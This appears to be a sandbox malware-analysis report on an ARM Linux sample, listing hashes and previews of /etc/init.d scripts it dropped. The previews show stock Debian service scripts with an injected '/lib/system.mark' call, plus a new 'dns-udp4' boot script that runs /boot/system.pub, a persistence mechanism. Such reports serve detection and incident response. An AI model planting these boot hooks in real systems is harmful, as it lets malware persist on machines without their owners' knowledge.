SHA1:	2E45CEA64AEE1115B5EDBAAC7407B340E47EC7C1
SHA-256:	4DE7B672D754167242FEB9A95D9FA35514114948CFD3567B8BB8BF294F38FB17
SHA-512:	4F426321E4A7123B6E0B19DEF3455CEACBA152FCB5F21A106B809F3B2FB2054300F391DEE9E498749544ED22C8B351AD5E35658813209917672052988D21DF8F
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] \|\| exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME \|\| true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] \|\| mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] \|\| [ -n "`ls /va

/etc/init.d/avahi-daemon

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2453
Entropy (8bit):	4.853742484748698
Encrypted:	false
SSDEEP:	48:9s2V+ig+Ui83MZoJQukTSiVC2/uldA0uv3uKv2ZsGyjyRfg/zsDE7Ed:93oijU4ukTSCu40uv3uKvdJOR4ADHd
MD5:	D6F4FB4B6543A32644DC249C8B6D17A0
SHA1:	C5E44B40458D426759A7EB88B4E55C3ACEF94077
SHA-256:	05EF48FCD09FA3D2BC5C5297F0C9852810F8CBECEA65B0ED26A980D4A5F9D387
SHA-512:	06573A9DC46732518C4BAC856AA7C47B67CB0612BAC0192312A95699DF090782F457EBD138FCD6AE9858F8359209A54EC020115E1EFE450C2EA68D47E4554D30
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

/etc/init.d/binfmt-support

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	5.05188801367894
Encrypted:	false
SSDEEP:	24:ai3V6yXngSBVSBNyj6edNHcBcNlekvx2w5mw+76opC:73ZngWVWNMNH0YlbJ2w4wrJ
MD5:	E6D454B5675D599827B9892551BAF33F
SHA1:	FC529362E60C9D6B0DC86779CFA890B6621FD11E
SHA-256:	37F47BEF4B4D1021E5FDC6BD2F4E90FA9BA3175A83DB2BE094EF68F50A07828B
SHA-512:	3752D5178841DDD8FB9F09BDA4EB0D2FA4391BB951273B3911347AC93135E9A516919E28487724371F6A7CE689BAA053855A3219FC68944751313B0405BA48DE
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system.mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 \|\| exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable \|\| CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable \|\| CODE=$?. log_end_msg $CODE. exi

/etc/init.d/bluetooth

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3071
Entropy (8bit):	5.405379841493847
Encrypted:	false
SSDEEP:	48:71OoPrcMbC/BUUzGrm92+kbM9A5LmiEQoOZoKkkFoM+Zh9YkFoMr4Ote:79TcWC/BUeem92R4q5LRPt5w9VplA
MD5:	85F7B5D11EBD6ABDA86B5DF999F8B6D6
SHA1:	898A95C0302A0D24763D2B10EDC21E921564B1C8
SHA-256:	5A23A691BEE3E1D9A1723811D45030CCAD72CDFDA4AF1C1B5BEC6C027F8831D3
SHA-512:	9BED1FAE531015163C3665B24B678AEA239EC8FA6F92E06CCD044AEAF1B490251B5D7196876FAF1E8C3F2C73E208E268BF9DB6EC9B0535FC7CABA5DC6542F692
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

/etc/init.d/console-setup.sh

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1301
Entropy (8bit):	4.338919117179571
Encrypted:	false
SSDEEP:	24:9lBie8ItKzeBcxlo8/z3ejhGJckS5gzjdJ5ZWkZg7zcOqb6:938yKzYcX/LshGJckS5gJ58kG7A9b6
MD5:	BDD323E45B8053AC9234F45E20BABD66
SHA1:	0141637CE3CE6E3401B3863FED8103F825427055
SHA-256:	44922CED598FFB90525BA2E3285418AE91C2788E4A3DEE0EEE1C3DBF8191AC96
SHA-512:	9BCD74E42D402FCA871BB0B7900821401FA5F229DE02D977D130A48D35BC088BAE03B8FE5D235EA3E1C0309B4B35DF069AA51F496BF8FD5406CDD4BCBCD7B12F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop\|status). # console-setup isn't a daemon. ;;. start\|force-reload\|restart\|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system.mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

/etc/init.d/cron

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3111
Entropy (8bit):	4.912604701068792
Encrypted:	false
SSDEEP:	48:5PMic6MicW4dJIrcz8WD23fK2LAb38ClAATDuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsYDT6MnidD/A3gU
MD5:	C47C5241A33BA37060C9A1A58C167E9E
SHA1:	9ED529B5EFC37F87EF208A43161D198838600310
SHA-256:	6EECCBE60DB542164C6E4F3ADB1291DF01D1502F9A12531D2CCD7A95A88F1712
SHA-512:	B01E7002EF994DF92650E51AA40438F636A8EEE1ABD5E6B6E65F64791CB78C49F412DDD29F82D5840ABDD917CF008713C7D2FBA0E929656ECF713DBB71B255AF
Malicious:	true
Preview:	#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON \|\| exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

/etc/init.d/cryptdisks

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	955
Entropy (8bit):	5.163687656510361
Encrypted:	false
SSDEEP:	12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrEcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKicr/ZkVyKDpjQ
MD5:	F59810FCEAD6967D3484941B757C5D9F
SHA1:	8E78AB09A2E17C4662DE668D65A620CBC4F2A95A
SHA-256:	3ABA882AD020C66D4F94787BB8CA8CE3F1C40CE725B4A8471009B561C0A951D0
SHA-512:	E99CD55831661A71CADD479321623D42FA9E22F8417F812C9357D229D5D3A76EDDA65B97D9A71C00C741EE910335CA3966637C5C6F6D154E8373CA154893CC22
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cryptdisks-early

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.162273569946851
Encrypted:	false
SSDEEP:	12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrEcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CBKYZkVyKDvjQ
MD5:	4D657844653E6118D801763C22C19937
SHA1:	6E7F91D90BAF86647698FA87FACD293CB345CF8B
SHA-256:	DF98C3C25E61F97881A20C39E5F44F544994FB3C56ACBBA6BE5F4BFEB6FD359E
SHA-512:	7915008586A4E3F57F8334E94F7A61E4FA3B51981AF2E0806B7AD2D9E0E6BBF8B321A3389D5A834EB73BF99957102A29DDF24841AA6D4E3354517A6668763CAA
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn])..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart\|reload\|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.)..echo "Usage: cryptdisks-early {start\|stop\|restart\|reload\|force-reload\|force-start}"..exit 1..;;.esac..

/etc/init.d/cups

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2856
Entropy (8bit):	5.228297603931064
Encrypted:	false
SSDEEP:	48:76MLNMwmbAzAZVCoLqLVj1I6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/FQRetsJ:7BWwmEMZVChVB7UoAaZUoGDvuG/UoGq/
MD5:	2A2270B6CC5B1BB95B8ED17ACC2C088E
SHA1:	E64F610A9E1145F5C930A7B2D1B31D9D301DF237
SHA-256:	A6854F423BD17C78AD8F61EDBED12417E1DE18CD8F35CB76295CE725CF888A99
SHA-512:	4D5A50E7EB4FB077574AD2B34C08D10270B5E5246A8C6D7D0CBFDDEC399093206C4D653C7AD6ACB0E211C037D5E4D45F5FC80DEA4CA8B5FB0E2A85C1759E9576
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups.# Required-Start: $syslog $remote_fs.# Required-Stop: $syslog $remote_fs.# Should-Start: $network avahi-daemon slapd nslcd.# Should-Stop: $network.# X-Start-Before: samba.# X-Stop-After: samba.# Default-Start: 2 3 4 5.# Default-Stop: 1.# Short-Description: CUPS Printing spooler and server.# Description: Manage the CUPS Printing spooler and server;.# make it's web interface accessible on http://localhost:631/.### END INIT INFO..# Author: Debian Printing Team <debian-printing@lists.debian.org>..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/cupsd.NAME=cupsd.PIDFILE=/run/cups/$NAME.pid.DESC="Common Unix Printing System".SCRIPTNAME=/etc/init.d/cups..unset TMPDIR..# Exit if the package is not installed.test -x $DAEMON \|\| exit 0..mkdir -p /run/cups/certs.[ -x /sbin/restorecon ] && /sbin/restorecon -R /run/cups..# Define LSB log_* functions..

/etc/init.d/cups-browsed

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1979
Entropy (8bit):	5.146376682341581
Encrypted:	false
SSDEEP:	48:7mU3mK7xpvyCKyhfPV5upSYf54v6YSBFQJvFn2b:7j3FpjhnV5upSYuv3ScJp2b
MD5:	DA422CE81DD723C1511C06DA133FC27A
SHA1:	BBC3D860F2A391DCA48430C7C683D101463FA364
SHA-256:	1F549EBA5DB1AECF858178F62437651FDF2BA032890C4E65D204262DCCBB6F8E
SHA-512:	A4D88E11ECDD83D280131E788E2610DDA68AABEFF73E54C877341A034689B182A0B6D52DE00E0AB0177D7373740F8CCB16EABF98E17BDA643F2ECEEE3BC985A3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: cups-browsed.# Required-Start: $syslog $remote_fs $network $named $time.# Required-Stop: $syslog $remote_fs $network $named $time.# Should-Start: avahi-daemon.# Should-Stop: avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: cups-browsed - Make remote CUPS printers available locally.# Description: This daemon browses Bonjour broadcasts of shared remote CUPS.# printers and makes these printers available locally by creating.# local CUPS queues pointing to the remote queues. This replaces.# the CUPS browsing which was dropped in CUPS 1.6.1. For the end.# the behavior is the same as with the old CUPS broadcasting/.# browsing, but in the background the standard method for network.# service announcement and discovery, Bonjour, is used..### END INIT INFO..DAEMON=/usr/sbin/cups-browsed.NAME=cups-browsed.PIDFIL

/etc/init.d/dbus

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, Unicode text, UTF-8 text executable
Category:	dropped
Size (bytes):	3255
Entropy (8bit):	5.122590071157076
Encrypted:	false
SSDEEP:	96:9JOxb7pmQJ3sQmx+xZRGWoGUuK2gY5W7zTXmgI:9Jwf7XMSIr7nXmL
MD5:	E85B436BDC8D0D1FAB58603A43BD7F55
SHA1:	53A674DE137A91FF396048EF8F09B0F306397136
SHA-256:	0FD1F38334022C7D46F8F429E0461DE6A6F20AC6BB4CF2B3C0C6DF6E44C0E92F
SHA-512:	8E285B86DE44C4FDDA957F903C9656E777D1F13D713EA84F7EAD5566D4093155E4836281710C855F5092F4C3B0DD9E5F808ABBBCFDE36F0911C732A669476A5D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: dbus.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: D-Bus systemwide message bus.# Description: D-Bus is a simple interprocess messaging system, used.# for sending messages between applications..### END INIT INFO.# -- coding: utf-8 --.# Debian init.d script for D-BUS.# Copyright . 2003 Colin Walters <walters@debian.org>.# Copyright . 2005 Sjoerd Simons <sjoerd@debian.org>..set -e..DAEMON=/usr/bin/dbus-daemon.UUIDGEN=/usr/bin/dbus-uuidgen.UUIDGEN_OPTS=--ensure.NAME=dbus.DAEMONUSER=messagebus.PIDDIR=/var/run/dbus.PIDFILE=$PIDDIR/pid.DESC="system message bus"..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..# Source defaults file; edit that file to configure this script..PARAMS="".if [ -e /etc/default/dbus ]; then./lib/system.mark. . /etc/default/dbus.fi..create_machineid() {. # Create machine-id file. i

/etc/init.d/dns-udp4

Download File

Process:	/tmp/arm5.elf
File Type:	Bourne-Again shell script, ASCII text executable
Category:	dropped
Size (bytes):	168
Entropy (8bit):	5.03458455286979
Encrypted:	false
SSDEEP:	3:TKH/AnsKhWeftXWQfv+NjWRLQ6WYkREpFNF/ebzkRKVFOWSXKWRAIhQ4+:jsKhLtXpv+1W/a2eMJnKWmz
MD5:	2C9C7188232B53D595FD0541654BBCAC
SHA1:	7D0AAB87AD2A7663236C5A7251E9EFAB1C47437A
SHA-256:	C334828BE737392703EF01044BD122F47C9188E0443FC81413F1801486E0EE9F
SHA-512:	CC841292BF0A1AB588D701BC65AB199520209C82C3AD6038BC12AE7CF8537EDDDBD04E480F5CBF972A0731F64F531063ABEA2D1863E126B8C42C88960A2240C7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/bash.### BEGIN INIT INFO.#chkconfig: 2345 10 90.#description:system.pub.# Default-Start: 2 3 4 5.# Default-Stop:.### END INIT INFO./boot/system.pub.exit 0

/etc/init.d/gdm3

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3102
Entropy (8bit):	5.045804889605048
Encrypted:	false
SSDEEP:	48:78unF1gLpANlduwTebFGB8B4ndfPaHa59zqPN/UsCVADsZvOsFzmxOsFC2WtFji:7dnM1aV3B5dNQaVAGvoe2Wtc
MD5:	979319372C9DA2093D245E5755FF36A6
SHA1:	9B5DD36873636794D6AE07792E7D4D9DED2C2489
SHA-256:	28C4D5946FDE3F9F7A846DA9F2E59F6A5A62FCECA7A527205F67A02478528D59
SHA-512:	89C92D9C74421B4AC6CE6BC46E09859CB72D836B69BDFE144FC8AA83D990FF135070D86C0A1FE225D8DB8CEE8756B67ABE8F117AB247EC7930B8C5E5A967DF0F
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: gdm3.# Should-Start: console-screen dbus network-manager.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: GNOME Display Manager.# Description: Debian init script for the GNOME Display Manager.### END INIT INFO.#.# Author: Ryan Murray <rmurray@debian.org>.#.set -e..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/gdm3.PIDFILE=/var/run/gdm3.pid..test -x $DAEMON \|\| exit 0..if [ -r /etc/default/locale ]; then./lib/system.mark. . /etc/default/locale. export LANG LANGUAGE.fi... /lib/lsb/init-functions..# To start gdm even if it is not the default display manager, change.# HEED_DEFAULT_DISPLAY_MANAGER to "false.".HEED_DEFAULT_DISPLAY_MANAGER=true.DEFAULT_DISPLAY_MANAGER_FILE=/etc/X11/default-display-manager..activate_logind() {. # Try to dbus activate logind to avoid a race conditions if we are not. # runnin

/etc/init.d/hddtemp

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3163
Entropy (8bit):	5.2621448888959215
Encrypted:	false
SSDEEP:	48:ietQlU+vdYb5tM7yL7yi47yIrrFML6YRv50JDRABzNfuhCv8Z//UZJ7iu6052m3s:FtQlTd65tp6iNlLLRRQ4AsUk6o2mc
MD5:	A5AD832AE20F98254D6020CE444485FD
SHA1:	43408C17AB8386C42B777ED1E38A2C0D0D90FC7E
SHA-256:	52BF10B965E7EBBC956E2C1C10E8E4280278662428F634459607FDD51B4BBB97
SHA-512:	A54A09CD8B65D935F28B120AB5AD675FFB23447111D188F152F47FB5164B0D67A09BD25672F9967BABD74C19563F5F48FECE642E6D51ECC3D5088261FBFD8B1F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# skeleton example file to build /etc/init.d/ scripts..# This file should be used to construct scripts for /etc/init.d..#.# Written by Miquel van Smoorenburg <miquels@cistron.nl>..# Modified for Debian GNU/Linux.# by Ian Murdock <imurdock@gnu.ai.mit.edu>..#.# Version: @(#)skeleton 1.8 03-Mar-1998 miquels@cistron.nl.#..### BEGIN INIT INFO.# Provides: hddtemp.# Required-Start: $remote_fs $syslog $network.# Required-Stop: $remote_fs $syslog $network.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: disk temperature monitoring daemon.# Description: hddtemp is a disk temperature monitoring daemon.### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=hddtemp.DAEMON=/usr/sbin/$NAME.DESC="disk temperature monitoring daemon"..DISKS="/dev/hd[a-z] /dev/hd[a-z][a-z]".DISKS="$DISKS /dev/sd[a-z] /dev/sd[a-z][a-z]".DISKS="$DISKS

/etc/init.d/hwclock.sh

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	3946
Entropy (8bit):	5.1533815522152295
Encrypted:	false
SSDEEP:	96:uYqy3be4txLsMwqTZLLFFT7aTfNvagXQwj5jNvaYXakeQz:VZbxtXFZPKTfNvawtjNva4n
MD5:	D79E755001A5DB9E20CEDB6C961025F2
SHA1:	EDC19EC928BF4DAD45DA256670D819453BB58AE8
SHA-256:	11069209E8BB5F1A4C1241C0639C07EA11B31E688A7C045936161CFBE5D8FEA2
SHA-512:	4BF748BD107D2C3340FD95E05FF58B1F1B60C5248C427F0764CD5E99C9EC0495608BC8D0052803714CE2B85E38F9DA03A092AD94E04AF29B345D4721607582A1
Malicious:	true
Preview:	#!/bin/sh.# hwclock.sh.Set and adjust the CMOS clock..#.# Version:.@(#)hwclock.sh 2.00 14-Dec-1998 miquels@cistron.nl.#.# Patches:.#..2000-01-30 Henrique M. Holschuh <hmh@rcm.org.br>.#.. - Minor cosmetic changes in an attempt to help new.#.. users notice something IS changing their clocks.#.. during startup/shutdown..#.. - Added comments to alert users of hwclock issues.#.. and discourage tampering without proper doc reading..# 2012-02-16 Roger Leigh <rleigh@debian.org>.# - Use the UTC/LOCAL setting in /etc/adjtime rather than.# the UTC setting in /etc/default/rcS. Additionally.# source /etc/default/hwclock to permit configuration...### BEGIN INIT INFO.# Provides: hwclock.# Required-Start: mountdevsubfs.# Required-Stop: mountdevsubfs.# Should-Stop: umountfs.# Default-Start: S.# X-Start-Before: checkroot.# Default-Stop: 0 6.# Short-Description: Sync hardware and system clock time..

/etc/init.d/irqbalance

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2707
Entropy (8bit):	4.999484335058729
Encrypted:	false
SSDEEP:	48:92ZPnWGmH6TMV5m11QU7dXCWQgxxsXuHtpyBMbtKxxsDBV/BkH5:92Z/WbZnm11LdyWFxKXuHtcBMbtKxKDc
MD5:	264DF0349838878E6A342635B4C6AAC6
SHA1:	FF2FC0C6330DACA16EAAA8FE91CB9B5A80EBA195
SHA-256:	CB5FA5A488AC0AE34080DAAA79AB37844BCBD9DFD374D6F9E1E9118245A8B3C7
SHA-512:	A187C35A0DC65DEA6591EE63954B84837A45B33F618BFD94AB8FCD030BC6828F9EE6B523158F5D26679BE651761C90378381D6CA0ACD55D5C477079DF8369AA0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.### BEGIN INIT INFO.# Provides: irqbalance.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: daemon to balance interrupts for SMP systems.### END INIT INFO.# irqbalance init script.# August 2003.# Eric Dorland..# Based on spamassassin init script..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/irqbalance.NAME=irqbalance.SNAME=irqbalance.DESC="SMP IRQ Balancer".PIDFILE="/run/$NAME.pid".PNAME="irqbalance".DOPTIONS=""..# Defaults - don't touch, edit /etc/default/.OPTIONS=""..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..test -f /etc/default/irqbalance && . /etc/default/irqbalance..# Beware: irqbalance tries to read and handle environment variables.# directly itself, but since start-stop-daemon clears the env.# we convert the variables to commandline arguments here....# (Note: in the daemon an option is enabled even if its set to.# e.g. the empty strin

/etc/init.d/iscsid

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1555
Entropy (8bit):	4.973705475535796
Encrypted:	false
SSDEEP:	24:2Xx/YpMr8MICUV7OlfrDNhay+HNCNBlH3U8lrQ5l8u4uuzG:MpuMAMICu7OlN+UBlH3U8lc/ZWzG
MD5:	17D9A0A3EA1CD82B2A6A20441C80F070
SHA1:	620A0F1B6910A8599B70373E1395E7C72D31DFD1
SHA-256:	8E41D01C9F88FCA987C6F56E3BF127AB5A9B2D151AC688748B4E68318701BF5C
SHA-512:	0DCF1BFA3B51D299B5D3F581CE6AF6B85B95806CC4854EE16451F852AD85C3733A8AC9D1FD887CE01C77B926F762787913D4A8BC19DF7C0260D9E75B6DA5AB25
Malicious:	true
Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: iscsid.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: iSCSI initiator daemon (iscsid).# Description: The iSCSI initiator daemon takes care of.# monitoring iSCSI connections to targets. It is.# also the daemon providing the interface for the.# iscisadm tool to talk to when administering iSCSI.# connections..### END INIT INFO..# Author: Christian Seiler <christian@iwakd.de>..DESC="iSCSI initiator daemon".DAEMON=/sbin/iscsid.PIDFILE=/run/iscsid.pid.OMITDIR=/run/sendsigs.omit.d..do_start_prepare() {..if ! /lib/open-iscsi/startup-chec

/etc/init.d/keyboard-setup.sh

Download File

Process:	/tmp/arm5.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1548
Entropy (8bit):	4.312093274159983
Encrypted:	false
SSDEEP:	48:9XfgD1yzyKzYcX/LshGJckS5MJAu8kGh5A9b6:9YQXC/w0SO
MD5:	4C516D25550878CE2CE024B6E97105DB
SHA1:	812E84ACA9890069BF1DBDEF175789DB8792F63D
SHA-256:	DE554C11A0C59B7354F88FD864DDFE7AE79BF3086319418BB27022B155693D85
SHA-512:	608967AF4BB7490885EA7E8EA8C5CFE2D38A7581FD3E9FE153793414063AC85079D1F3AA530650DF2D1ED47F7EA14A0D1BB38CA1F2F90627B03195D877F69335
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
